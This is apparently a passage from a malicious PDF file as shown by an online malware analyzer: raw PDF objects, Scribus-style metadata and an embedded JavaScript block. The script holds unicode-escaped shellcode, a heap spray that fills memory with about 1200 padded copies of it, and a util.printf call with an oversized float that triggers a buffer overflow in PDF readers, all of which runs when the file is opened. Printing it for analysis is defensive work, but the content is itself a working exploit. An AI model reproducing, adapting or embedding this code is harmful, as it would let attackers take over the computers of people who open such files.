"%u1EC3%u664D%u0AF5%u7B7A%u02E2%u665D%u15FF%u5347" +
"%u3090%u7C57%u1FD5%u715B%u2290%u7B46%u33E4%u6056" +
"%u06F5%u125A%u08DC%u765F%u0EDC%u605C%u15F1%u5347" +
"%u1290%u7E4C%u08FD%u1250%u35C5%u5672%u10FF%u7E50" +
"%u06FF%u465A%u21FF%u7E57%u26F5%uE33E%u8A7D%uB1D7" +
"%uD126%uF8CE%u8D79%uEED1%u9A67%uF9C8%u9D27%uE6C8" +
"%u9826%uE7CE%uCD6C%uEE89%u9B71%u8B27");
var QtSX7FFMO5Yh=unescape("%u0"+"A0A%u"+"0A0A");
var JjSyR=20;
var exh8jb=JjSyR+zFHYxkRYCwD2.length;
while(QtSX7FFMO5Yh.length<exh8jb)QtSX7FFMO5Yh+=QtSX7FFMO5Yh;
var qViE7Tw=QtSX7FFMO5Yh.substring(0,exh8jb);
var uIm38I7M=QtSX7FFMO5Yh.substring(0,QtSX7FFMO5Yh.length-exh8jb);
while(uIm38I7M.length+exh8jb<0x60000)uIm38I7M=uIm38I7M+uIm38I7M+qViE7Tw;
var vIpNxCz5kqu3=new Array();
for(v0FN43s=0;
v0FN43s<1200;v0FN43s++){vIpNxCz5kqu3[v0FN43s]=uIm38I7M+zFHYxkRYCwD2}
var gipW5Eb=12999999999999999999888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888;
util.printf("%45"+"000f",gipW5Eb);
endstream
endobj
14 0 obj
<</Creator (Scribus 1.3.3.12)
/Title <>
/Producer (Scribus PDF Library 1.3.3.12)
/Author <>
/Keywords <>
/Trapped /False
/ModDate (D:20080806014227)
/CreationDate (D:20080806014227)
>>
endobj
xref
0 15
0000000000 65535 f
0000000015 00000 n
0000000264 00000 n
0000000282 00000 n
0000000327 00000 n
0000000400 00000 n
0000000431 00000 n
0000000451 00000 n
0000000490 00000 n
0000000556 00000 n
0000000734 00000 n
0000000784 00000 n
0000000865 00000 n
0000000912 00000 n
0000006893 00000 n
trailer
<</Info 14 0 R
/Root 1 0 R
/Size 15
>>
startxref
7094
%%EOF
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.